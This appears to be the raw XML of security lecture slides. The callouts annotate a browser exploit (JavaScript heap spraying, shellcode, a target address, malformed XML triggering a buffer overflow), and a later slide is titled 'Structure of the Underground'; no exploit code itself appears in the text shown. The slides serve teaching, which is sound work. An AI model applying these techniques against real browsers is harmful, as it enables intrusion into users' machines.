              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7E63E56-9B2A-4D4D-8250-AF78532D9292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261035" y="782919"/>
            <a:ext cx="7888941" cy="406399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{248414D7-70CB-4918-B329-2CAE7251E553}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1025858"/>
            <a:ext cx="10158506" cy="3731413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8531B817-14C2-4CF2-93C7-47EBB3B5CECC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4655671"/>
            <a:ext cx="5084482" cy="406398"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87BA9A82-3496-4928-894D-2B60899B5DC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832970" y="4923407"/>
            <a:ext cx="6960347" cy="784122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3036ECC9-8FCE-4627-86F2-59B158CDB536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832969" y="5524042"/>
            <a:ext cx="11275360" cy="784122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C427642B-A643-4657-8F25-A3D26CA57DB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832968" y="6075080"/>
            <a:ext cx="11275360" cy="707319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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2" name="Speech Bubble: Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{978C3879-11EC-46C2-A4B6-872ADBCFCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7297271" y="137459"/>
            <a:ext cx="4685553" cy="519864"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32568"/>
              <a:gd name="adj2" fmla="val 9583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New HTML page with some JavaScript inside</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Speech Bubble: Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{178EF9C7-95C8-4D78-9506-1D77391A1D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10351248" y="1383554"/>
            <a:ext cx="1440329" cy="519864"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -100618"/>
              <a:gd name="adj2" fmla="val 1306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Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Speech Bubble: Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22CF40D2-2F4A-467D-B278-34449CF592C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2823884" y="3774676"/>
            <a:ext cx="2184398" cy="519864"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -5182"/>
              <a:gd name="adj2" fmla="val 13607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Target address </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Speech Bubble: Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF704AF2-3874-4761-86BB-895BB274804B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6564194" y="2972035"/>
            <a:ext cx="4020135" cy="1245536"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46510"/>
              <a:gd name="adj2" fmla="val 11736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Heap spraying: fill memory with copies of the shellcode to increase chances of successful exploitation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Speech Bubble: Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66C2C141-0F8D-42C9-824A-C6F228E2D09D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8049725" y="3928797"/>
            <a:ext cx="3234230" cy="1017169"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46510"/>
              <a:gd name="adj2" fmla="val 11736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Malformed XML data that triggers a buffer overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Speech Bubble: Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58FF54E7-177B-4AD8-9716-44796C8B4AFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="169581" y="4123200"/>
            <a:ext cx="2985995" cy="1192268"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 26694"/>
              <a:gd name="adj2" fmla="val 142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Trigger the overflow by injecting the bugged XML into the HTML page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61884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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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42" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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42" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="5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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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42" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="61" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="62" presetID="16" presetClass="entr" presetSubtype="21"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par>
                                <p:cTn id="65" presetID="42"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="6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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="80" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="81" presetID="16" presetClass="entr" presetSubtype="21"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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="84" presetID="42"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8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6" presetClass="exit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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par>
                                <p:cTn id="94" presetID="42" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="95" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="96" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="99" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="100" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="101" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="103" presetID="42" presetClass="entr" presetSubtype="0" fill="hold" grpId="0"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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA288E99-8C2D-4A88-999A-23A6D9C7AD29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7414562" y="632347"/>
            <a:ext cx="3021534" cy="10176"/>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163747" y="162006"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Structure of the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Underground</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="739750" y="855947"/>
          <a:ext cx="10515600" cy="6101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Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3251745" y="4966385"/>
            <a:ext cx="0" cy="145411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85766" y="6180655"/>
            <a:ext cx="0" cy="2398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10438616" y="6171647"/>
            <a:ext cx="0" cy="3315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3251745" y="6421980"/>
            <a:ext cx="8325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504609" y="6162431"/>
            <a:ext cx="0" cy="2864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4504609" y="6448927"/>
            <a:ext cx="7106809" cy="677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a:xfrm>
            <a:off x="11611418" y="2126665"/>
